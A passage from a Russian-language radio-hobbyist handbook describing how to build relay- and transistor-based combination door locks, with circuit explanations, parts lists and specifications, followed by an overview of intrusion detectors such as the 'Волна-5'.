Для изготовления сторожевого устройства использованы следующие комплектующие ЭРИ и ЭРЭ: переключатели S1 типа П1Т-1-1 или П2К с контактами на размыкание, S2 — кнопка звонковая, работающая на замыкание контактов только при нажатии на нее, S3—S9 — МТ1, S10—S16 — КМ1-1 или КП-1, S17 — КМ1-1, КП-1, МТ1; ЭМ1 типа ЭП 41/33 или самодельный, конструкция которого рассмотрена выше; электрический звонок ВА1 любого типа с электропитанием от сети переменного тока напряжением 220 В частотой 50 Гц; электромагнитные реле К.1—К.7 типа МКУ-48 или любые другие реле также с питанием от сети переменного тока напряжением 220 В, имеющие контактные пары, которые работают на замыкание и на размыкание; плавкий предохранитель F1 любого типа на ток срабатывания 1 А; электрический соединитель X1 типа «вилка».
Как следует из принципиальной схемы, код сторожевого устройства состоит из семи цифр 1—7, принцип кодирования которых заключается в следующем. Контакты переключателей S3—S9 устанавливаются в такое положение, чтобы при нажатии соответствующих кнопок срабатывали реле и своими контактами замыкали электрическую цепь питания ИМ ЭМ1. В положении контактов переключателей, показанных на схеме, набран код 1345.
Набор шифра производится в любое время и по желанию хозяина объекта ручками переключателей. В зависимости от положения пар контактов переключателей можно подать сигнал на срабатывание ИМ при нажатии одной, двух, трех и т. д. кнопок S10—S16 — это зависит от положения ручек управления переключателей S3—S9.
После того как собран блок реле с кодирующим узлом, рекомендуется у всех ручек управления переключателей S3—S9 сделать гравировку или надписи цифрами от 1 до 7, в порядке возрастания номеров. Если переключателю S3 присвоена цифра 1, то S4 — цифра 2, S5 — цифра 3 и т. д. Такие же номера необходимо выгравировать или сделать надписи у кнопок дешифратора, установленного на входной двери охраняемого объекта.
Срабатывает сторожевое устройство следующим образом. Сначала нажимается первая кнопка, соответствующая переключателю S10, и переменное напряжение сети подается на обмотку первого реле К1, которое контактами К1.1 самоблокируется, а контактами К. 1. 2 подключит обмотку ИМ к контактам 1 и 3 переключателя S3. Затем необходимо нажать кнопку под номером 3 для того, чтобы сработало реле КЗ и своими контактами КЗ.1 заблокировало питание, а контактами КЗ. 2 обеспечило дальнейшую подготовку цепи ИМ к подаче электропитания.
Если нажать вторую кнопку и подать напряжение питания на обмотку реле К2, то произойдет самоблокировка питания этого реле контактами К2. 1 и размыкание контактов К2. 2, которые разорвут электрическую цепочку, и ни при каком дальнейшем наборе цифр кода ИМ не получит питания.
Для того чтобы сторожевое устройство сработало, необходимо последовательно нажать кнопки 4 и 5, контакты которых позволят замкнуть цепь питания ИМ ЭМ1. Блокировочная кнопка S2 подает напряжение питания на электрический звонок и имеет обычную схему включения. Вторая блокировочная кнопка S1 возвращает схему сторожевого устройства в исходное положение. Эту кнопку можно установить скрытно или на входной двери. При скрытном положении кнопки ее контакты должны быть разомкнуты и включаются только в момент перед дешифровкой. В этом случае сторожевое устройство в ждущем режиме находится в обесточенном состоянии, но открыть входную дверь невозможно. Если кнопка переключателя устанавливается на входную дверь, то при открывании двери контакты этого переключателя разрываются, а при закрывании двери вся система возвращается в исходное состояние и готова к приему нового посетителя.
Радиолюбители должны заинтересоваться установкой и размещением еще одной дополнительной кнопки S17, с помощью которой можно управлять сторожевым устройством на значительном расстоянии от входной двери. Ее можно установить и внутри объекта и снаружи, но обязательно в укромном месте. С ее помощью можно подавать напряжение питания на ИМ и приводить его сердечник в действие.
Рациональная компоновка конструктивных элементов сторожевого устройства и выполнение требований эстетики и эргономики позволит домашнему мастеру изготовить всё устройство компактным и удобным в эксплуатации. Одно главное требование: верхняя лицевая планка, на которой укрепляются кнопки дешифратора и которая выступает над поверхностью двери, должна быть выполнена из стали толщиной не менее 4 мм, а сами кнопки должны быть глубоко утоплены и не иметь люфта в отверстиях.
Правильно собранное сторожевое устройство в налаживании и регулировке не нуждается и начинает работать сразу же после установки на место.
Основные электрические параметры
и технические характеристики сторожевого устройства
на электромагнитных реле
Номинальное напряжение питающей сети
переменного тока, В..................... 220
Номинальная частота питающей сети
переменного тока, Гц.................... 50
Коэффициент нелинейных искажений питающей сети
переменного тока, %, не более.............. 10
Пределы изменения напряжения питающей сети
переменного тока, %, не более.............. ±10
Пределы изменения частоты питающей сети
переменного тока, %, не более.............. ±1
Напряжение срабатывания реле, В............ 187
Напряжение отпускания реле, В.............. 63
Сопротивление изоляции токоведущих элементов
между собой и корпусом устройства, МОм...... 10
Суммарное время нахождения обмоток реле
под напряжением, ч, не более............... 100
Количество одновременно охраняемых объектов, шт. 1 Срок службы устройства, ч, не менее........... 5000
Вероятность безотказной работы, не менее....... 0, 92
кпд, %, не менее........................ 80
Максимальная мощность устройства, Вт........ 100
Условия эксплуатации:
температура окружающей среды, °С ........ —40...+50
относительная влажность воздуха при температуре 35 °С, % не менее................ 95+ -3
атмосферное давление воздуха, мм рт. cт...... 200... 900
Рис. 3.17. Принципиальная схема сторожевого устройства на семи электромагнитных реле.
3.12. СТОРОЖЕВОЕ УСТРОЙСТВО НА ТРЕХ ТРИГГЕРАХ
Сторожевое устройство, выполненное на ППП, предназначено для автоматического открывания механического замка, имеющего пружинную защелку. Замок устанавливается на входных дверях охраняемых объектов и срабатывает при правильном наборе установленного кода. Открывание дверей осуществляется после набора закодированного числа, состоящего из трех цифр от 1 до 10. Срабатывание устройства обеспечивается в строго определенной последовательности, так же, как срабатывают триггеры.
Принципиальная электрическая схема сторожевого устройства приведена на рис. 3.18, которая включает в себя следующие функциональные узлы, блоки и электрические цепи: входное устройство, сетевой понижающий трансформатор питания Т1, выпрямительное устройство, ИМ, кодирующее устройство и дешифратор, электронный автомат, собранный на ППП, выходные цепи, соединяющие устройство с механическим замком и дешифратором.
Подключение сторожевого устройства к сети переменного тока производится с помощью электрического соединителя X1 типа «вилка», смонтированного с электрическим кабелем. Работает сторожевое устройство от сети переменного тока напряжением 220 В частотой 50 Гц. Плавкие предохранители F1 и F2, установленные на входе, защищают устройство от коротких замыканий и перегрузок, возникающих иногда из-за допущенных при монтаже ошибок или из-за неисправных комплектующих элементов. Предохранители рассчитаны на ток срабатывания 1 А.
Во входной цепи установлен емкостный фильтр, собранный на конденсаторах С1 и С2 и защищающий устройство от низкочастотных помех, которые проникают в электрическую сеть от работы различных электротехнических устройств и механизмов. Включение и выключение
электропитания осуществляется с помощью двухпозиционного переключателя S1, о чем сигнализирует неоновая лампа H1.
В качестве сетевого понижающего трансформатора питания Т1 выбран унифицированный трансформатор ТПП, все типоразмеры которого применяются для питания ycройств на ППП. Особенностью трансформаторов типа ППП является низкие напряжение, действующее на вторичных обмотках. Конструкция трансформатора способна противостоять механическим и климатическим воздействиям, указанным в первой главе справочника. Она способна сохранять работоспособность при повышенной влажности и во всех случаях температурных воздействий обеспечивать необходимый запас электрической прочности изоляции обмоток с учетом категорий размещения трансформатора. Изготавливается трансформатор на ленточном магнитопроводе типономинала ШЛМ25Х25, который рассчитан на уменьшенный расход медного обмоточного провода.
Вместо покупного трансформатора можно применить самодельный, изготовленный на магнитопроводе типа Ш25Х25 или УШ25Х32 по данным, которые приведены в табл. 3.16. На выводах вторичных обмоток покупного трансформатора действует переменное напряжение при подключенной нагрузке следующих значений: 11 и 12 — 4,98 В; 13 и 14 — 4,98 В; 15 и 16 — 20 В; 17 и 18 — 20 В;
19 и 20 — 1,34 В; 21 и 22 — 1,34 В. Мощность трансформатора равна 57 Вт.
Сетевой понижающий трансформатор выполняет функции трансформации напряжения, гальванической развязки вторичных цепей от сети электропитания, обеспечения расчетного значения выпрямленного напряжения постоянного тока и безопасной эксплуатации сторожевого устройства.
При изготовлении самодельного трансформатора необходимо особое внимание обратить на качество обмоточного провода, при этом сопротивление изоляции должно быть не менее 20 МОм.
При намотке провода на катушку используется рядовая укладка с изоляцией каждого слоя друг от друга. В качестве изоляционного материала используется кабельная бумага или тонкая лакоткань. Наиболее прочная изоляция должна быть выполнена между первичной обмоткой, экраном и вторичной обмоткой. Самодельный транс-
Таблица 3. 16. Моточные данные сетевою понижающего трансформатора питания Т1, примененного в сторожевом устройстве на трех триггерах
форматор можно изготовить по упрощенной схеме, выполнить одну первичную обмотку с выводами 2 и 9, рассчитанную на подключение к сети переменного тока напряжением 220 В. Затем намотать один слой экранного провода с изоляцией между слоями и намотать одну вторичную обмотку, на которой при холостом ходе должно действовать переменное напряжение 26 В. Сопротивление изоляции между всеми токоведущими элементами и магнитопроводом должно быть не менее 10 МОм при относительной влажности воздуха до 90% при температуре 25 °С.
Выпрямительное устройство собрано на четырех диодах VD1-VD4 и конденсаторе СЗ, который является фильтром, сглаживающим пульсации выпрямленного напряжения постоянного тока. Выпрямитель выполнен по однофазной двухполупериодной мостовой схеме, которая характеризуется как положительными, так и отрицательными параметрами. К положительным относятся: повышенная частота пульсации на выходе выпрямителя постоянного тока, достаточно низкое обратное напряжение на комплекте выпрямительных диодов, полное использование габаритной мощности сетевого трансформатора. Котрицательным — повышенные потери и более низкий кпд по сравнению с другими выпрямительными схемами, невозможность установки диодов на одном металлическом теплоотводе без изоляционных прокладок, повышенный расход комплектующих ЭРЭ и более высокая стоимость изготовления. На выходе выпрямителя в точках А и Б под нагрузкой действует постоянное напряжение 24 В.
Далее по схеме в устройстве собран электронный блок на девяти транзисторах биполярного типа. Все транзисторы устанавливаются на печатную плату, за исключением транзистора VT1. В устройстве использованы транзисторы малой мощности, которые относятся к ППП третьего поколения, являются наиболее дешевыми по стоимости комплектующими ЭРЭ данного типа.
В составе электронного блока сторожевого устройства работают три транзисторных триггера и один усилитель тока. Первый триггер выполнен на транзисторах VT8 и VT9, второй — на транзисторах VT5 и VT6, третий — на транзисторах VT3 и VT4. Двухкаскадный усилитель тока собран на транзисторах VT1 и VT2.
Транзисторные триггеры относятся к классу полупроводниковых автоматических устройств, которые характеризуются тем, что могут сохранять длительное время одно из двух своих крайних состояний устойчивого равновесия и скачкообразно переключаться по электрическому сигналу из одного крайнего состояния в другое. В исходном состоянии сторожевого устройства транзисторы VT9, VT6 и VT4 триггеров открыты и потенциал на их коллекторах равен нулю. При включении электропитания это положение транзисторов достигается за счет заряда конденсатора С4 через резистор R17.
Порядок срабатывания сторожевого устройства при дешифровке установленного кода определяется подачей сигналов на триггеры. В данном случае первый триггер всегда срабатывает первым при замыкании контактов соответствующего кнопочного переключателя. Второй триггер срабатывает после первого триггера также после замыкания контактов кнопочного переключателя и зависит от установленного шифра. Третий триггер срабатывает вслед за вторым триггером.
На принципиальной схеме (рис. 3.18) показан установленный шифр 492. Первая цифра кода 4 определена номером кнопочного переключателя S4, контакты которого соединены через перемычку между соединителями Х8 и Х9 с базой транзистора VT8 первою триггера. Таким образом, первый триггер (транзисторы VT8 и VT9), перемычка между электрическими соединителями Х8 и Х9 и переключатель S4 определяют первую цифру будущего кода. Если установить перемычку между соединителями Х8 и любым другим соедини гелем, например с Х15, то первая цифра кода будет 7. Вторая цифра кода определяется цепочкой S9, Х19, Х18, база транзистора VT5. Третья цифра кода зависит от соединений элементов база транзистора VT7, резистор R9, база транзистора VT3, электрические соединители Х4, Х5 и перемычка между ними, переключатель кнопочный S2. Итак, рабочими контактами соединителей являются Х8, Х18 и Х4, остальные контакты соединителей Х2, Х6,Х10,Х12, Х14, Х16, Х20 — холостые, они соединены между собой параллельно. При монтаже сторожевого устройства возможны другие варианты соединений указанных контактов соединителей.
В составе устройства предусмотрен электромагнит, включенный в коллекторную цепь транзистора VT1 и рассчитанный на работу от постоянного тока напряжением 24 В. Срабатывает электромагнит ЭМ1 только после правильного набора трехзначного кода. При нажатии на кнопку S4, соответствующую первой цифре установленного кода, на базу транзистора VT8 подается отрицательный потенциал рабочего напряжения, который приводит к отпиранию этого транзистора. В это же время транзистор VT7 и выпрямительный диод VD6 закрываются. Следовательно, первый триггер после нажатия на кнопку S4 переключился в другое состояние. Теперь, если будет правильно нажата вторая кнопка S9, второй триггер также перейдет во второе устойчивое состояние. При нажатии на кнопку S2 переключится и третий триггер, то есть транзистор VT4 закроется, сработает усилитель тока, так как транзисторы VT2 и VT1 откроются. Это состояние триггеров и усилителя тока позволит в автоматическом режиме подать напряжение на электромагнит, который сработает и откроет замок входной двери. Для того чтобы вернуть сторожевое устройство в исходное состояние, необходимо разорвать цепь электропитания или переключателем S1 или дополнительным переключателем, устанавливаемым на входной двери (на схеме не указан).
При изготовлении устройства использованы следующие комплектующие ЭРИ и ЭРЭ: транзисторы VT1 типа П214, VT2 — МП25, VT3 - VT9 — МП42; сетевой понижающий трансформатор питания Т1 типа ТПП269 127/220-50; электрические соединители X1 типа «вилкам с электрическим кабелем, Х2 Х21 — КМЗ-1 приборные; плавкие предохранители F1 и F2 типа ПМ 1-1 А; индикаторная лампа Н1 типа ТН-0,2; выпрямительные диоды VD1-VD4 типа Д226Б, VD5-Д9Б, VD6-Д9Б; конденсаторы С1 типа МБМ-II-750В-0,01 мкФ,С2 МБМ-11-750В-0,01 мкФ, СЗ К50-6-50В-200 мкФ, С4 — К53-1А-6В-0.5 мкФ;
резисторы R1 типа МЛТ-2-390 кОм, R2 — МЛТ-0,25-91 кОм, КЗ - МЛТ-0,25-300 Ом, R4 — МЛТ-0,25-1 кОм, R5 — МЛТ-0,25 6,8 кОм, R7 — МЛТ-0,25-10 кОм, R8 — МЛТ-0,25-3,9 кОм, R9 — МЛТ-0,25-750 Ом, R10 — МЛТ-0,25-10 кОм, R11 — МЛТ-0,25 3,9 кОм, R 12 - МЛТ-0,25-10 кОм, R13 — МЛТ-0,25-3,9 к0м,R14 — МЛТ-0,25-10 кОм,R15 — МЛТ-0,25-3,9 к0м,R16— МЛТ-0,25-10 кОм, R17 — МЛТ-0,25-3,9 кОм, R18 — МЛТ-0,25-10 кОм; переключатели S11 типа П2Т-1-1, S2—S10 — КМ1-1;
электромагнит ЭМ1 или соленоид самодельной конструкции.
При сборке и регулировке сторожевого устройства можно произвести замену некоторых ЭРЭ. Например, электрические переключатели типа КМ1-1 можно заменить на переключатели типа КП-1, КП-2, ТВ2-1; резисторы типа МЛТ — на ВС, ВСа, МТ, БЛП, С2-10, С2-ЗЗН, Р1-4; конденсаторы типа К50-6 — на К50-3, К50-12, К50-16, К50-20. О замене транзисторов рассказано в первой главе.
Основные электрические параметры и технические характеристики сторожевого устройства на трех триггерах
Номинальное напряжение питающей сети
переменного тока, В .................... .220
-Номинальная частота питающей сети
переменного тока, Гц ................... .50
Номинальное напряжение постоянного тока
на выходе выпрямителя под нагрузкой, В ....... 24
Коэффициент нелинейных искажений питающей сети
переменного тока, %, не более .............. 12
Пределы изменения напряжения питающей сети
переменного тока, В ..................... 187...242
Пределы изменения частоты питающей сети
переменного тока, % .................... ± 1
Пределы изменения напряжения постоянною тока
для питания электронной схемы, В .......... .22...26
Максимальный ток, на выходе выпрямителя, А .... 1,5
Ток, потребляемый устройством во время
срабатывания устройства. А, не более ........ .0,5
Количество одновременно охраняемых объектов, шт. 1
Время срабатывания устройства после набора
правильного кода, мс, не более ............. 0,8
Количество колируемых знаков, шт............ 3
Количество вариантов набора кода, шт, более..... 100 000
Срок службы, ч, не менее .................. 5000
Вероятность безотказной работы при риске заказчика в=0,95, не менее ............... 0,95
Сопротивление изоляции между токоведущими элементами и металлическим корпусом, при нормальных условиях эксплуатации, МОм, не менее ........ 5
Помехозащищенность устройства при воздействии
внешнею электромагнитного поля, дБ, не менее . . 100
Мощность сетевого понижающего трансформатора
питания Т1,Вт, не менее ................. 57
Ток, потребляемый устройством в режиме ожидания, мА, не более......................... 40
Условия эксплуатации:
температура окружающей среды, С........ —35...+ 45
относительная влажность воздуху при температуре 25 °С, не более..................... 95±3
атмосферное давление воздуха, мм рт. ст...... 200... 1000
Рис. 3.18. Принципиальная схема сторожевого устройства на трех триггерах.
3. 13. ЭЛЕКТРОМЕХАНИЧЕСКОЕ СТОРОЖЕВОЕ УСТРОЙСТВО НА ЭЛЕКТРОМАГНИТНЫХ РЕЛЕ
Это сторожевое устройство относится к классу изделий дискретной автоматики, основу которых составляют электромеханические контакты, управляющие электромагнитным ИМ. Как правило, такие изделия представляют собой единую сторожевую систему, в которой подача напряжения на ИМ и его включение в действие происходят лишь при условии, что замыкания всех промежуточных контактов осуществляются точно в заданной последовательности. А включение ИМ в данном варианте устройства приводит к перемещению сердечника электромагнита и связанных с ним защелки или стопора ригеля механического замка, устанавливаемого на входной двери.
Сторожевое устройство предназначено для установки на входных дверях жилых домов и производственных объектов, а также на внутренних дверях офисов, складов, цехов, лабораторий и т. д. Устройство, смонтированное на внутренних дверях, разрешает свободный вход в помещение лицам, знающим зашифрованное число, и в любом случае предупреждает об открывании двери и наборе шифра. Попытки посторонних посетителей открыть замок простым перебором цифр не могут привести к положительному результату, так как количество вариантов шифра насчитывает десятки тысяч.
Устройство включает в свой состав очень маленькую номенклатуру комплектующих ЭРИ и ЭРЭ, и все они рассчитаны на жесткие условия эксплуатации. При правильной технологии изготовления и монтаже элементов как внутри блоков, так и всей наружной проводки устройство может эксплуатироваться в условиях УХЛ и ХЛ, при температуре окружающей среды до —35 °С и 45 °С, при относительной влажности воздуха при температуре 25 °С до 95% и при пониженном атмосферном давлении до 200 мм рт. ст.
Работает сторожевое устройство непосредственно от сети переменного тока напряжением 220 В частотой 50 Гц, и звонковая кнопка находится при замыкании контактов под высоким напряжением. Вторичный источник электропитания изготавливается в единой конструкции с релейным автоматом.
Принципиальная электрическая схема электромеханического сторожевого устройства на электромагнитных реле приведена на рис. 3. 19. Подключение устройства к сети электропитания осуществляется с помощью электрического соединителя X1 типа «вилка» или прямым подключением электрического кабеля к однофазной сети. В последнем случае электрический соединитель X1 из схемы исключается. На входе устройства установлены плавкие предохранители, защищающие его от коротких замыканий и перегрузок в цепях устройства. Для исключения ошибок и как следствие коротких замыканий необходимо использовать только проверенные комплектующие элементы и монтажные провода, сопротивление изоляции которых в нормальных условиях эксплуатации не менее 50 МОм.
В конструкции сторожевого устройства можно выделить такие узлы, как БП с релейным автоматом, входные цепи с электрическим звонком и емкостным фильтром, пульт управления и дешифратор, устанавливаемый на входной двери. Конденсатор С/ обеспечивает защиту от помех, проникающих в сеть питания как от работы внешних источников, так и от работы релейного переключателя при замыкании и размыкании контактов. Конденсатор сравнительно небольшой емкости устанавливается параллельно первичной обмотке сетевого трансформатора Т1
и рассчитан на напряжение 750 В. Характерной особенностью данного устройства является его высокая экономичность, так как в режиме ожидания оно не потребляет электроэнергии. Схема его включения содержит переключатели S1, S2 и S12 с разомкнутыми контактами. Одновременно необходимо обратить внимание на включение и работу электрического звонка. Как следует из схемы, электрический звонок включен автономно и его работа зависит от положения контактов переключателей S1 S2 и S12. Это условие изменится, если будет выбран другой шифр.
В положении, указанном на схеме, шифр устройства — 0987. Количество цифр в коде определяется количеством рабочих реле КЗ—Кб.
Для электропитания электромагнитных реле и ИМ в устройстве собрано выпрямительное устройство, на выходе которого действует постоянное напряжение 32 В под нагрузкой. Для понижения высокого сетевого напряжения применен сетевой понижающий трансформатор питания Т1 стержневой самодельной конструкции. Изготавливается трансформатор на магнитопроводе типа ПЛ или П с двумя катушками по данным, приведенным в табл. 3.17. Активная площадь поперечного сечения стержней магнитопровода должна быть не менее 5 см2. Магнитопровод стержневой конструкции трансформатора выполняется П-образной формы и имеет два стержня с катушками. На каждом стержне помещается половина витков первичной и половина витков вторичной обмоток. Они соединяются между собой последовательно, так, чтобы намагничивающие силы этих полуобмоток совпадали по направлению. Стержневые трансформаторы обладают значительно меньшей чувствительностью к внешним магнитным полям, так как знаки ЭДС помех, наводимых в двух катушках трансформатора, равны по величине, но противоположны по знаку, поэтому взаимно уничтожаются. Эти трансформаторы по сравнению с броневыми имеют меньшую индуктивность рассеяния (на каждой катушке только половина витков, и поэтому толщина катушки меньшая), меньшее внешнее электромагнитное поле (магнитодвижущая сила в отдельных катушках имеет равный знак).
Сетевой трансформатор обеспечивает полную гальваническую развязку между вторичными цепями устройства и первичной сетью электропитания высокого напряжения,
Таблица 3. 17 Моточные данные сетевого понижающего трансформатора питания Т1, примененного в электромеханическом сторожевом устройстве на электромагнитных реле
расчетное значение выпрямленного напряжения постоянного тока и более высокую электробезопасность.
Параллельно вторичным обмоткам сетевого трансформатора включен индикатор, который сигнализирует о срабатывании первого реле сторожевого устройства. Он выполнен на светодиоде VD1, VD2, R1. После замыкания контактов переключателя S1 и наборе установленного шифра на вторичной обмотке трансформатора Т1 появляется переменное напряжение около 30...35 В. Сразу же вспыхивает световой сигнализатор включения устройства.
Выпрямитель собран на четырех диодах средней мощности (на ток от 1 до 10 А) по классической однофазной двухполупериодной мостовой схеме, которая по сравнению с другими известными схемами выпрямителей характеризуется рядом положительных и отрицательных параметров: повышенной частотой пульсации выпрямленного напряжения постоянного тока; пониженным обратным напряжением на комплекте выпрямительных диодов;
достаточно высоким коэффициентом использования габаритной мощности сетевого трансформатора питания Т1;
повышенными потерями и более низким кпд; большим расходом диодов и вследствие этою повышенной стоимостью изготовления; невозможностью установки диодов на металлическом радиаторе охлаждения без изоляционных прокладок. Примененная схема выпрямителя наиболее распространена в радиолюбительской практике вследствие своей простоты, высоких электрических выходных параметров и надежной эксплуатации.
Выпрямитель работает на емкостную нагрузку (емкостный фильтр) на электролитическом конденсаторе С'2, который является фильтром, сглаживающим пульсации напряжения на выходе выпрямителя.
Как следует из схемы, релейный автомат с устройством кодирования и дешифрации собран на электромагнитных реле К1—К6, одно из которых является ИМ. Установка нового шифра производится следующим образом. На шифровальном поле, где собраны малогабаритные приборные клеммы Х2—Х43, металлическими перемычками соединяются соответствующие контакты рабочих реле, переключателей S3—S12 и вилки, подключаемые к соединителям с нечетными обозначениями приборных клемм (Х5, X11...Х43). На схеме вилки, подключенные к контактам обмоток рабочих реле, обозначены цифрами 1—4. Первой при наборе шифра подключается вилка с номером 1. Если необходимо набрать шифр 1479, то клемму (цифра 1) с проводником, идущим от реле К6, подключают к соединителю Х7, клемму от реле К5 — к Х19, клемму от реле К4 с цифрой 3 — к соединителю Х31. клемму от реле КЗ — к соединителю Х39. Последовательно соединяют Х5, Х17, Х29, Х37 с точкой А и положительным выводом источника питания. Далее так же последовательно соединяют выводы Х9, Х13, Х21, Х25, Х38 и Х41 с контактом 2 реле К2.1. Завершается кодирование параллельным соединением контактов X11, Х15, Х23, Х27, Х35, Х43 с обмоткой реле К.2, которое обеспечивает сброс при неправильном наборе кода.
После подключения устройства к сети переменного тока переключателем S1 нажимают одновременно на две кнопки, включающие питание звонка S2 и первого рабо чего реле (К6—S12). При шифре, показанном на схеме, срабатывает первое реле К16 замыкая свои контакты К6.1, блокирующие питание реле, и контакты К6.2, подготавливающие срабатывание второго рабочего реле К5. Это реле сработает после замыкания контактов 1 и 2 переключателя S11. При нажатии на кнопку этого переключателя срабатывает вторая цифра кода 9. Контакты К5.1 самоблокируют питание реле К5, а контакты К5.2 подготавливают следующее реле к очередному срабатыванию. После замыкания контактов переключателя S10 срабатывает реле К4, его контакты К4.1 самоблокируют питание реле К4, а контакты К4.2 подготавливают реле КЗ к работе. Таким образом, к этому моменту правильно набрана третья цифра кода. Далее замыкают контакты переключателя S9, срабатывает реле КЗ. Его контакты КЗ.1 самоблокируют питание этого реле, а контакты КЗ.2 подключают электромагнит ЭМ1 к выпрямителю постоянного тока. Итак, при последовательном нажатии на кнопки переключателей S12, S11, S10, S9 был набран ранее установленный код 0987.
Новый шифр 1479 может быть правильно набран при последовательном нажатии на кнопки переключателей S3, S6, S9, S11.
При изготовлении сторожевого устройства использованы следующие комплектующие ЭРИ и ЭРЭ: выпрямительные диоды VD2 типа КД105Б, VD3—VD6 — Д242Б; светодиод VD1 типа АЛ307А; сетевой понижающий трансформатор стержневой конструкции Т1; предохранители F1, F2 типа ПМ-1-1 А; звонок электрический бытовой ВА1 любого типа с электропитанием от сети переменного тока напряжением 220 В; конденсаторы С1 типа МБМ-11-750В-0.1 мкФ, С2 — К50-6-50В-50 мкФ; электрические соединители X1 типа «вилка», Х2—Х43 — КМЗ-1; электромагнитные реле РЭС-10 (паспорт РС4.529.031-03).
Необходимо заметить, что при нажатии на кнопку S2 при замкнутых контактах переключателя S1 напряжение переменного тока будет подано на сетевой понижающий трансформатор питания и электрический звонок ВА1. После отпускания кнопки S2 устройство обесточится и придет в исходное состояние. Если при нажатии на кнопку S2 контакты переключателя S1 разомкнуты, то работать будет только электрический звонок в обычном режиме. После того как был правильно набран установленный код и замок откроется, трансформатор Т1 отключится от сети нажатием любой нерабочей кнопки. При неправильном наборе шифра и ошибке в порядке набора кода сторожевое устройство не сработает, а при нажатии на нерабочую кнопку, например S3, сработает реле К2, которое своими контактами К2.1 разорвет цепь питания электромагнитных реле и возвратит все устройство в начальное положение. Все ранее правильно набранные цифры кода будут сброшены.
При изготовлении сторожевого устройства можно произвести замену некоторых комплектующих ЭРЭ. Можно применить электромагнитные реле типа РЭС-10 (паспорт РС4.529.031-16, РС4.524.313, РС4.529.031-11), РЭС-22;
можно применить унифицированный сетевой понижающий трансформатор стержневой конструкции типа ТС-40-5 или типа ТПП208-127/220-50, ТПП307-127/220-50 ТПП270-127/220-50.
Конструктивно сторожевое устройство рекомендуется выполнить в виде двух самостоятельных сборочных единиц: устройства дешифрования и БП с шифровальными контактами. Электрический звонок работает в обычном режиме и устанавливается традиционным способом. Изменения в монтаже питания звонка показаны на схеме.
Основные электрические параметры сторожевого устройства приведены ниже. Условия эксплуатации обеспечиваются конструкцией устройства и должны отвечать требованиям для УХЛ.
Конструкция дешифратора сторожевого устройства включает в свой состав: малогабаритные переключатели S2—S12 и индикаторное устройство. Все остальные элементы схемы собраны в БП и соединены с дешифратором монтажными проводами. Дешифратор располагается на входной двери таким образом, чтобы обеспечивался доступ только к кнопкам управления, имеющим максимально утопленные контакты, которые не могут быть демонтированы и вскрыты. Конструктивные решения дешифраторов общеизвестны, широко применяются в кодовых замках, которые используются на входных дверях большинства общественных помещений и жилых зданий.
Следует еще раз обратить внимание мастеров-радиолюбителей на то, что, выполняя работы, связанные с электричеством, необходимо помнить основные правила безопасности.
Основные электрические параметры и технические характеристики электромеханического сторожевого устройства на электромагнитных реле
Номинальное напряжение питающей сети
переменного тока, В .................... 220
Номинальная частота питающей сети
переменного тока, Гц.................... 50
Номинальное напряжение питания электромагнитных
реле постоянным током, В................. 32
Коэффициент нелинейных искажений питающей сети
переменного тока, %, не более.............. 10
Пределы изменения напряжения питающей сети
переменного тока, В..................... 200... 240
Пределы изменения частоты питающей сети
переменного тока, Гц.................... 49, 5... 50, 5
Номинальное напряжение на выводах обмоток
сетевого трансформатора, В:
1 и 1', 2 и 2' ....................... .110
3 и 3', 4 и 4' ....................... .16
Количество одновременно охраняемых объектов, шт .1
Количество цифр в наборе кода, шт ........... .4
Срок службы, ч, не менее .................. .10 000
Вероятность безотказной работы устройства
при риске заказчика в=0,92, не менее ........ .0,98
Сопротивление изоляции между токоведущими частями
и металлическим корпусом, МОм, не менее .... .15
Помехозащищенность устройства при воздействии
внешнего электромагнитного поля, дБ, не менее . .110
кпд, %, не менее ....................... 96
Рис. 3.19. Принципиальная схема электромеханического сторожевого устройства на электромагнитных реле.
3. 2. ИСПОЛНИТЕЛЬНЫЕ УСТРОЙСТВА И ДАТЧИКИ ПЕРЕДАЧИ ИНФОРМАЦИИ О ПРОНИКНОВЕНИИ НА ОХРАНЯЕМЫЙ ОБЪЕКТ
После срабатывания многих типов сторожевых устройств и систем включаются звуковые, световые или электромеханические сигнализаторы, которые устанавливаются на охраняемом объекте или ЦПУ и являются составной частью электронной схемы. По этому принципу создано большинство существующих сторожевых устройств.
В условиях города наибольшую эффективность при охране объектов, особенно частных автомашин, можно достичь только при применении дублирующих устройств охраны и сигнализации, которые могут передавать информацию о вторжении на охраняемый объект на расстоянии до десятка километров. К таким устройствам относятся миниатюрные УКВ ЧМ передатчики, извещатели охранные объемные радиоволновые для подвижных средств и извещатели охранно-пожарные для стационарных объектов.
Из существующих и применяемых в качестве дополнительных источников информации рекомендуются следующие типы: "Штифт", «Лемур», «Аргус-2», "Аргус-2М", "Фобос", «Нева», «Рубин», «Сигнал», «Адемко», "Адемко-998" , "Фотон-4", «Дип-3»,«ИПД-01»,«Волна»,«Риф-М»,«ИПР-1»,«Эхо-2»,«СМК-1»,«СМК-3»,«Окно-2М»,Рубеж-3», «Вектор-2», «Вектор-3» и многие другие изделия.
Например, охрана закрываемых помещений может осуществляться с помощью извещателя сторожевой сигнализации типа «Волна-5», который относится к группе объемных радиоволновых устройств. Данное устройство, используемое в качестве датчика, предназначено для обнаружения лиц, проникающих в охраняемое закрытое помещение, и формирования тревожного извещения. Охранный извещатель «Волна-5» обеспечивает:
обнаружение посторонних лиц, вторгшихся в охраняемое помещение;
практически 100-процентное отсутствие ложных срабатываний в помещениях с интенсивной вентиляцией и быстрыми потоками воздуха;
установку нескольких извещателей в одном закрытом охраняемом помещении;
полуавтоматическую регулировку дальности действия в пределах заданных значений;
возможность работы с другими системами и датчиками обнаружения посторонних лиц.
Следует заметить, что большинство охранных извещателей, в том числе и типа «Волна-5», работают наиболее эффективно, если постороннее лицо попадает в центр зоны обнаружения. В данном случае сама зона обнаружения представляет собой замкнутый объем электромагнитных волн, излучаемых рассматриваемым датчиком, который действует на расстоянии до 16 м в горизонтальной и вертикальной плоскостях.
Основные электрические параметры и технические характеристики охранного извещателя " Волна-5"
Номинальное напряжение питающей сети
переменного тока. В................. 220
Номинальная частота питающейсети
переменного тока, Гц .................. 50
Номинальное напряжение автономного источника
питания постоянного тока, В ............... 9
Оптимальная площадь обнаружения посторонних лиц и охраняемом помещении, м2 ...............90
Расстояние до границы действия излучателя, м:
максимальная ....................... 12...16
минимальная ................... 3.. 4
Контролируемый объем, м^3, не менее ........... 200
Ток, потребляемый электронным извещателем
и рабочем режиме, мА, не более ........... 2
Габаритные размеры (без кронштейна), мм ...... 97Х9ЗХ52
Условия эксплуатации:
температура окружающей среды, °С ........ —30...+50
относительная влажность воздуха
